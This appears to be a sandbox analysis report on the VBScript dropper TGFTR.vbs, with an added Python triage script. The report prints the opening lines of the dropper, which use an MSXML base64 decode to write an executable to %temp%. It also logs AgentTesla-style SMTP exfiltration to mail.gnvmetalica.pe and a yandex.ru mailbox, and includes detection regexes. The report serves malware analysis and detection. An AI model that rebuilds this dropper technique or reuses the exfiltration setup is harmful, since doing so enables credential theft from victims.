                                                        Encrypted:false
                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                        MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                        SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                        SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                        SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:ASCII text, with very long lines, with CRLF line terminators
                                                        Entropy (8bit):5.990695300026366
                                                        TrID:
                                                        • Visual Basic Script (13500/0) 100.00%
                                                        File name:TGFTR.vbs
                                                        File size:956955
                                                        MD5:49d19f0ce5da944d1423d3f189b22103
                                                        SHA1:305fbc7a46a028c4354f13a417ba46f67464ebab
                                                        SHA256:ac0517947c0be7baad44fb8f054215c00ada03bb61772bab9eb52e48a9c3a097
                                                        SHA512:3a704970dcd520d1faee08cca897d30c23f89de5d45242066d96fa16f4ba5ee1a8c5bb82163e1896c70f95f58a7e845af403681f0432a9945f1812779dd4675b
                                                        SSDEEP:12288:A7qHO9HgZYIUSgCPCNieCCXmiFY8qGHy7gzaBUQgngZEDlc+mb/PM4w:AaO9ANUSgCPeHCCXtqGDkTggZOlBk7w
                                                        File Content Preview:on error resume next..dim medo,sea,medoff..dim maasr..set helper = createobject("Wscript.Shell")..maasr = helper.ExpandEnvironmentStrings("%temp%")..set medo = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")..medo.dataType="bin.base64"..med
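The preview above (the report renders each CRLF line break as two dots) shows the dropper's whole trick in its first lines: it resolves %temp% through Wscript.Shell, creates an MSXML DOM element and sets its dataType to "bin.base64", so that assigning a base64 string to the element makes the runtime decode it into raw bytes that can then be written to disk. The 717,312-byte .NET PE32 files the report lists under the user's Temp and Roaming directories are the result. The script below is an added triage example, not code from the report or from the sample: it scans a VBS text for that set of static tells and for long base64 runs, decodes each run, and reports which ones decode to a PE image (MZ header) together with a SHA-256. SAMPLE_VBS is constructed from the preview's visible lines plus a stand-in tail and a tiny fake PE; the indicator names, the regexes and the 64-character run threshold are this example's assumptions.

```python
from __future__ import annotations

import base64
import binascii
import hashlib
import re
from dataclasses import dataclass

# Static tells of the MSXML base64 dropper pattern. These regexes are this
# example's own assumptions, not detection rules taken from the report.
INDICATORS = {
    "error_suppression": re.compile(r"^\s*on\s+error\s+resume\s+next", re.I | re.M),
    "wscript_shell": re.compile(r'createobject\s*\(\s*"wscript\.shell"\s*\)', re.I),
    "temp_dir_lookup": re.compile(r'expandenvironmentstrings\s*\(\s*"%temp%"\s*\)', re.I),
    "msxml_base64_node": re.compile(r'\.datatype\s*=\s*"bin\.base64"', re.I),
}

# A run of base64 alphabet characters long enough to be a payload rather than
# a short constant; 64 is an assumed threshold, real droppers carry far more.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


@dataclass
class Payload:
    offset: int          # character offset of the base64 run inside the script
    encoded_len: int
    decoded_len: int
    is_pe: bool          # decoded bytes start with the 'MZ' DOS header magic
    sha256: str


def score_indicators(vbs_text: str) -> dict[str, bool]:
    """Report which of the dropper's static tells are present in the script."""
    return {name: rx.search(vbs_text) is not None for name, rx in INDICATORS.items()}


def extract_payloads(vbs_text: str) -> list[Payload]:
    """Decode every long base64 run and describe what it contained."""
    found: list[Payload] = []
    for match in B64_RUN.finditer(vbs_text):
        data = match.group(0).rstrip("=")
        data += "=" * (-len(data) % 4)      # re-pad: droppers often strip '='
        try:
            raw = base64.b64decode(data, validate=True)
        except binascii.Error:
            continue                         # not decodable base64, skip it
        found.append(Payload(
            offset=match.start(),
            encoded_len=len(match.group(0)),
            decoded_len=len(raw),
            is_pe=raw[:2] == b"MZ",
            sha256=hashlib.sha256(raw).hexdigest(),
        ))
    return found


def triage(vbs_text: str) -> dict:
    """Combine the indicator hits and the decoded payloads into one verdict."""
    indicators = score_indicators(vbs_text)
    payloads = extract_payloads(vbs_text)
    drops_pe = any(p.is_pe for p in payloads)
    return {
        "indicators": indicators,
        "payloads": payloads,
        "drops_pe": drops_pe,
        "suspicious": indicators["msxml_base64_node"] and drops_pe,
    }


# Constructed sample: the first seven lines mirror the report's file content
# preview; the assignment of the encoded blob and the fake 'MZ' stub stand in
# for the part the preview truncates and are not the sample's real code.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60 + b"This program cannot be run in DOS mode.\r\n"
SAMPLE_VBS = (
    "on error resume next\r\n"
    "dim medo,sea,medoff\r\n"
    "dim maasr\r\n"
    'set helper = createobject("Wscript.Shell")\r\n'
    'maasr = helper.ExpandEnvironmentStrings("%temp%")\r\n'
    'set medo = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")\r\n'
    'medo.dataType="bin.base64"\r\n'
    f'medo.text = "{base64.b64encode(FAKE_PE).decode()}"\r\n'
    "sea = medo.nodeTypedValue\r\n"
)
SAMPLE_PE_SHA256 = hashlib.sha256(FAKE_PE).hexdigest()

if __name__ == "__main__":
    result = triage(SAMPLE_VBS)
    print(result["indicators"])
    for p in result["payloads"]:
        print(f"offset={p.offset} encoded={p.encoded_len} decoded={p.decoded_len} "
              f"pe={p.is_pe} sha256={p.sha256}")
    print("drops PE:", result["drops_pe"], "suspicious:", result["suspicious"])
```

Run it against the real file with `triage(open("TGFTR.vbs", errors="replace").read())`; the SHA-256 of a decoded run can then be compared with the hashes in the dropped-file entries above to confirm that the embedded blob is the executable the sandbox saw written to disk. Droppers that split the blob across concatenated string literals or run it through a character substitution first will not decode with this plain regex and need the concatenation resolved before the base64 step.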

                                                        File Icon

                                                        Icon Hash:e8d69ece869a9ec4

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        Timestamp                 Protocol  SID      Message                              Src Port  Dst Port  Source IP    Dest IP
                                                        01/01/22-09:12:05.421047  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49799     587       192.168.2.3  162.241.148.206
                                                        01/01/22-09:12:08.540772  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49800     587       192.168.2.3  162.241.148.206
                                                        01/01/22-09:13:01.940135  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49803     587       192.168.2.3  162.241.148.206
                                                        01/01/22-09:13:05.724118  TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49804     587       192.168.2.3  162.241.148.206

                                                        Network Port Distribution

                                                        TCP Packets

                                                        Timestamp                           Src Port  Dst Port  Source IP        Dest IP
                                                        Jan 1, 2022 09:12:03.607444048 CET  49799     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:03.748084068 CET  587       49799     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:03.748193979 CET  49799     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:04.450804949 CET  587       49799     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:04.451267004 CET  49799     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:04.592031002 CET  587       49799     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:04.595851898 CET  49799     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:04.736983061 CET  587       49799     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:04.737663984 CET  49799     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:04.918613911 CET  587       49799     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:04.945499897 CET  587       49799     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:04.946636915 CET  49799     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:05.087377071 CET  587       49799     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:05.087737083 CET  49799     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:05.269418001 CET  587       49799     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:05.278330088 CET  587       49799     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:05.278609991 CET  49799     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:05.419640064 CET  587       49799     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:05.419703960 CET  587       49799     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:05.421046972 CET  49799     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:05.421148062 CET  49799     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:05.421993971 CET  49799     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:05.422091961 CET  49799     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:05.561997890 CET  587       49799     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:05.562351942 CET  587       49799     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:05.562927961 CET  587       49799     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:05.616802931 CET  49799     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:07.110874891 CET  49799     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:07.252335072 CET  587       49799     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:07.252568960 CET  49799     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:07.252804995 CET  49799     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:07.308780909 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:07.393135071 CET  587       49799     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:07.450454950 CET  587       49800     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:07.450628042 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:07.643258095 CET  587       49800     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:07.643572092 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:07.784706116 CET  587       49800     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:07.785276890 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:07.927659988 CET  587       49800     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:07.928175926 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:08.073498011 CET  587       49800     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:08.073766947 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:08.214665890 CET  587       49800     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:08.214996099 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:08.396425962 CET  587       49800     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:08.396507978 CET  587       49800     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:08.396923065 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:08.537779093 CET  587       49800     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:08.537833929 CET  587       49800     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:08.540518045 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:08.540771961 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:08.540971041 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:08.541203976 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:08.541496992 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:08.541662931 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:08.541812897 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:08.541980982 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:12:08.689071894 CET  587       49800     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:08.689133883 CET  587       49800     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:08.689251900 CET  587       49800     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:12:08.732492924 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:00.623840094 CET  49803     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:00.762836933 CET  587       49803     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:00.763016939 CET  49803     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:00.958172083 CET  587       49803     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:00.958606958 CET  49803     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:01.124368906 CET  587       49803     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:01.124885082 CET  49803     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:01.264482021 CET  587       49803     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:01.264997005 CET  49803     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:01.444714069 CET  587       49803     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:01.472667933 CET  587       49803     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:01.473191023 CET  49803     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:01.612147093 CET  587       49803     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:01.612683058 CET  49803     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:01.792792082 CET  587       49803     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:01.796439886 CET  587       49803     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:01.798892975 CET  49803     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:01.937895060 CET  587       49803     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:01.937932968 CET  587       49803     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:01.940135002 CET  49803     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:01.940505981 CET  49803     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:01.940697908 CET  49803     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:01.940900087 CET  49803     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:02.079382896 CET  587       49803     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:02.079596996 CET  587       49803     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:02.079987049 CET  587       49803     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:02.126877069 CET  49803     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:03.982043982 CET  49803     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:04.122360945 CET  587       49803     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:04.122512102 CET  49803     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:04.122667074 CET  49803     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:04.261471033 CET  587       49803     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:04.500616074 CET  49804     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:04.640346050 CET  587       49804     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:04.642960072 CET  49804     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:04.822457075 CET  587       49804     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:04.822925091 CET  49804     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:04.962836981 CET  587       49804     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:04.963478088 CET  49804     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:05.103945017 CET  587       49804     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:05.105282068 CET  49804     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:05.247020006 CET  587       49804     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:05.247709036 CET  49804     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:05.387444019 CET  587       49804     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:05.387980938 CET  49804     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:05.568588018 CET  587       49804     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:05.582730055 CET  587       49804     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:05.583429098 CET  49804     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:05.723165035 CET  587       49804     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:05.723213911 CET  587       49804     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:05.723994970 CET  49804     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:05.724117994 CET  49804     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:05.724206924 CET  49804     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:05.724314928 CET  49804     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:05.724436045 CET  49804     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:05.724509954 CET  49804     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:05.724565983 CET  49804     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:05.724633932 CET  49804     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:05.863756895 CET  587       49804     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:05.863812923 CET  587       49804     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:05.863934040 CET  587       49804     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:05.864001989 CET  587       49804     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:05.864015102 CET  587       49804     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:05.864027023 CET  587       49804     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:05.864609957 CET  587       49804     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:05.908900976 CET  49804     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:43.928107023 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:44.070090055 CET  587       49800     162.241.148.206  192.168.2.3
                                                        Jan 1, 2022 09:13:44.070264101 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:44.070429087 CET  49800     587       192.168.2.3      162.241.148.206
                                                        Jan 1, 2022 09:13:44.210900068 CET  587       49800     162.241.148.206  192.168.2.3

                                                        UDP Packets

                                                        Timestamp                           Src Port  Dst Port  Source IP    Dest IP
                                                        Jan 1, 2022 09:12:03.442965031 CET  52130     53        192.168.2.3  8.8.8.8
                                                        Jan 1, 2022 09:12:03.590718031 CET  53        52130     8.8.8.8      192.168.2.3
                                                        Jan 1, 2022 09:12:07.288503885 CET  55102     53        192.168.2.3  8.8.8.8
                                                        Jan 1, 2022 09:12:07.307257891 CET  53        55102     8.8.8.8      192.168.2.3
                                                        Jan 1, 2022 09:13:00.458184958 CET  56527     53        192.168.2.3  8.8.8.8
                                                        Jan 1, 2022 09:13:00.474710941 CET  53        56527     8.8.8.8      192.168.2.3
                                                        Jan 1, 2022 09:13:04.477238894 CET  49559     53        192.168.2.3  8.8.8.8
                                                        Jan 1, 2022 09:13:04.496376038 CET  53        49559     8.8.8.8      192.168.2.3

                                                        DNS Queries

                                                        Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name                 Type            Class
                                                        Jan 1, 2022 09:12:03.442965031 CET  192.168.2.3  8.8.8.8  0x64c6    Standard query (0)  mail.gnvmetalica.pe  A (IP address)  IN (0x0001)
                                                        Jan 1, 2022 09:12:07.288503885 CET  192.168.2.3  8.8.8.8  0x62da    Standard query (0)  mail.gnvmetalica.pe  A (IP address)  IN (0x0001)
                                                        Jan 1, 2022 09:13:00.458184958 CET  192.168.2.3  8.8.8.8  0x2f04    Standard query (0)  mail.gnvmetalica.pe  A (IP address)  IN (0x0001)
                                                        Jan 1, 2022 09:13:04.477238894 CET  192.168.2.3  8.8.8.8  0x8aac    Standard query (0)  mail.gnvmetalica.pe  A (IP address)  IN (0x0001)

                                                        DNS Answers

                                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                        Jan 1, 2022 09:12:03.590718031 CET | 8.8.8.8 | 192.168.2.3 | 0x64c6 | No error (0) | mail.gnvmetalica.pe | | 162.241.148.206 | A (IP address) | IN (0x0001)
                                                        Jan 1, 2022 09:12:07.307257891 CET | 8.8.8.8 | 192.168.2.3 | 0x62da | No error (0) | mail.gnvmetalica.pe | | 162.241.148.206 | A (IP address) | IN (0x0001)
                                                        Jan 1, 2022 09:13:00.474710941 CET | 8.8.8.8 | 192.168.2.3 | 0x2f04 | No error (0) | mail.gnvmetalica.pe | | 162.241.148.206 | A (IP address) | IN (0x0001)
                                                        Jan 1, 2022 09:13:04.496376038 CET | 8.8.8.8 | 192.168.2.3 | 0x8aac | No error (0) | mail.gnvmetalica.pe | | 162.241.148.206 | A (IP address) | IN (0x0001)

                                                        SMTP Packets

                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                        Jan 1, 2022 09:12:04.450804949 CET | 587 | 49799 | 162.241.148.206 | 192.168.2.3 | 220-bh-ht-15.webhostbox.net ESMTP Exim 4.94.2 #2 Sat, 01 Jan 2022 08:12:04 +0000
                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                            220 and/or bulk e-mail.
                                                        Jan 1, 2022 09:12:04.451267004 CET | 49799 | 587 | 192.168.2.3 | 162.241.148.206 | EHLO 373836
                                                        Jan 1, 2022 09:12:04.592031002 CET | 587 | 49799 | 162.241.148.206 | 192.168.2.3 | 250-bh-ht-15.webhostbox.net Hello 373836 [102.129.143.96]
                                                            250-SIZE 52428800
                                                            250-8BITMIME
                                                            250-PIPELINING
                                                            250-PIPE_CONNECT
                                                            250-AUTH PLAIN LOGIN
                                                            250-STARTTLS
                                                            250 HELP
                                                        Jan 1, 2022 09:12:04.595851898 CET | 49799 | 587 | 192.168.2.3 | 162.241.148.206 | AUTH login c2FsZUBnbnZtZXRhbGljYS5wZQ==
                                                        Jan 1, 2022 09:12:04.736983061 CET | 587 | 49799 | 162.241.148.206 | 192.168.2.3 | 334 UGFzc3dvcmQ6
                                                        Jan 1, 2022 09:12:04.945499897 CET | 587 | 49799 | 162.241.148.206 | 192.168.2.3 | 235 Authentication succeeded
                                                        Jan 1, 2022 09:12:04.946636915 CET | 49799 | 587 | 192.168.2.3 | 162.241.148.206 | MAIL FROM:<sale@gnvmetalica.pe>
                                                        Jan 1, 2022 09:12:05.087377071 CET | 587 | 49799 | 162.241.148.206 | 192.168.2.3 | 250 OK
                                                        Jan 1, 2022 09:12:05.087737083 CET | 49799 | 587 | 192.168.2.3 | 162.241.148.206 | RCPT TO:<edum3du@yandex.ru>
                                                        Jan 1, 2022 09:12:05.278330088 CET | 587 | 49799 | 162.241.148.206 | 192.168.2.3 | 250 Accepted
                                                        Jan 1, 2022 09:12:05.278609991 CET | 49799 | 587 | 192.168.2.3 | 162.241.148.206 | DATA
                                                        Jan 1, 2022 09:12:05.419703960 CET | 587 | 49799 | 162.241.148.206 | 192.168.2.3 | 354 Enter message, ending with "." on a line by itself
                                                        Jan 1, 2022 09:12:05.422091961 CET | 49799 | 587 | 192.168.2.3 | 162.241.148.206 | .
                                                        Jan 1, 2022 09:12:05.562927961 CET | 587 | 49799 | 162.241.148.206 | 192.168.2.3 | 250 OK id=1n3ZUj-003F49-BD
                                                        Jan 1, 2022 09:12:07.110874891 CET | 49799 | 587 | 192.168.2.3 | 162.241.148.206 | QUIT
                                                        Jan 1, 2022 09:12:07.252335072 CET | 587 | 49799 | 162.241.148.206 | 192.168.2.3 | 221 bh-ht-15.webhostbox.net closing connection
                                                        Jan 1, 2022 09:12:07.643258095 CET | 587 | 49800 | 162.241.148.206 | 192.168.2.3 | 220-bh-ht-15.webhostbox.net ESMTP Exim 4.94.2 #2 Sat, 01 Jan 2022 08:12:07 +0000
                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                            220 and/or bulk e-mail.
                                                        Jan 1, 2022 09:12:07.643572092 CET | 49800 | 587 | 192.168.2.3 | 162.241.148.206 | EHLO 373836
                                                        Jan 1, 2022 09:12:07.784706116 CET | 587 | 49800 | 162.241.148.206 | 192.168.2.3 | 250-bh-ht-15.webhostbox.net Hello 373836 [102.129.143.96]
                                                            250-SIZE 52428800
                                                            250-8BITMIME
                                                            250-PIPELINING
                                                            250-PIPE_CONNECT
                                                            250-AUTH PLAIN LOGIN
                                                            250-STARTTLS
                                                            250 HELP
                                                        Jan 1, 2022 09:12:07.785276890 CET | 49800 | 587 | 192.168.2.3 | 162.241.148.206 | AUTH login c2FsZUBnbnZtZXRhbGljYS5wZQ==
                                                        Jan 1, 2022 09:12:07.927659988 CET | 587 | 49800 | 162.241.148.206 | 192.168.2.3 | 334 UGFzc3dvcmQ6
                                                        Jan 1, 2022 09:12:08.073498011 CET | 587 | 49800 | 162.241.148.206 | 192.168.2.3 | 235 Authentication succeeded
                                                        Jan 1, 2022 09:12:08.073766947 CET | 49800 | 587 | 192.168.2.3 | 162.241.148.206 | MAIL FROM:<sale@gnvmetalica.pe>
                                                        Jan 1, 2022 09:12:08.214665890 CET | 587 | 49800 | 162.241.148.206 | 192.168.2.3 | 250 OK
                                                        Jan 1, 2022 09:12:08.214996099 CET | 49800 | 587 | 192.168.2.3 | 162.241.148.206 | RCPT TO:<edum3du@yandex.ru>
                                                        Jan 1, 2022 09:12:08.396507978 CET | 587 | 49800 | 162.241.148.206 | 192.168.2.3 | 250 Accepted
                                                        Jan 1, 2022 09:12:08.396923065 CET | 49800 | 587 | 192.168.2.3 | 162.241.148.206 | DATA
                                                        Jan 1, 2022 09:12:08.537833929 CET | 587 | 49800 | 162.241.148.206 | 192.168.2.3 | 354 Enter message, ending with "." on a line by itself
                                                        Jan 1, 2022 09:12:08.541980982 CET | 49800 | 587 | 192.168.2.3 | 162.241.148.206 | .
                                                        Jan 1, 2022 09:12:08.689251900 CET | 587 | 49800 | 162.241.148.206 | 192.168.2.3 | 250 OK id=1n3ZUm-003FBN-F0
                                                        Jan 1, 2022 09:13:00.958172083 CET | 587 | 49803 | 162.241.148.206 | 192.168.2.3 | 220-bh-ht-15.webhostbox.net ESMTP Exim 4.94.2 #2 Sat, 01 Jan 2022 08:13:00 +0000
                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                            220 and/or bulk e-mail.
                                                        Jan 1, 2022 09:13:00.958606958 CET | 49803 | 587 | 192.168.2.3 | 162.241.148.206 | EHLO 373836
                                                        Jan 1, 2022 09:13:01.124368906 CET | 587 | 49803 | 162.241.148.206 | 192.168.2.3 | 250-bh-ht-15.webhostbox.net Hello 373836 [102.129.143.96]
                                                            250-SIZE 52428800
                                                            250-8BITMIME
                                                            250-PIPELINING
                                                            250-PIPE_CONNECT
                                                            250-AUTH PLAIN LOGIN
                                                            250-STARTTLS
                                                            250 HELP
                                                        Jan 1, 2022 09:13:01.124885082 CET | 49803 | 587 | 192.168.2.3 | 162.241.148.206 | AUTH login c2FsZUBnbnZtZXRhbGljYS5wZQ==
                                                        Jan 1, 2022 09:13:01.264482021 CET | 587 | 49803 | 162.241.148.206 | 192.168.2.3 | 334 UGFzc3dvcmQ6
                                                        Jan 1, 2022 09:13:01.472667933 CET | 587 | 49803 | 162.241.148.206 | 192.168.2.3 | 235 Authentication succeeded
                                                        Jan 1, 2022 09:13:01.473191023 CET | 49803 | 587 | 192.168.2.3 | 162.241.148.206 | MAIL FROM:<sale@gnvmetalica.pe>
                                                        Jan 1, 2022 09:13:01.612147093 CET | 587 | 49803 | 162.241.148.206 | 192.168.2.3 | 250 OK
                                                        Jan 1, 2022 09:13:01.612683058 CET | 49803 | 587 | 192.168.2.3 | 162.241.148.206 | RCPT TO:<edum3du@yandex.ru>
                                                        Jan 1, 2022 09:13:01.796439886 CET | 587 | 49803 | 162.241.148.206 | 192.168.2.3 | 250 Accepted
                                                        Jan 1, 2022 09:13:01.798892975 CET | 49803 | 587 | 192.168.2.3 | 162.241.148.206 | DATA
                                                        Jan 1, 2022 09:13:01.937932968 CET | 587 | 49803 | 162.241.148.206 | 192.168.2.3 | 354 Enter message, ending with "." on a line by itself
                                                        Jan 1, 2022 09:13:01.940900087 CET | 49803 | 587 | 192.168.2.3 | 162.241.148.206 | .
                                                        Jan 1, 2022 09:13:02.079987049 CET | 587 | 49803 | 162.241.148.206 | 192.168.2.3 | 250 OK id=1n3ZVd-003Goy-Ry
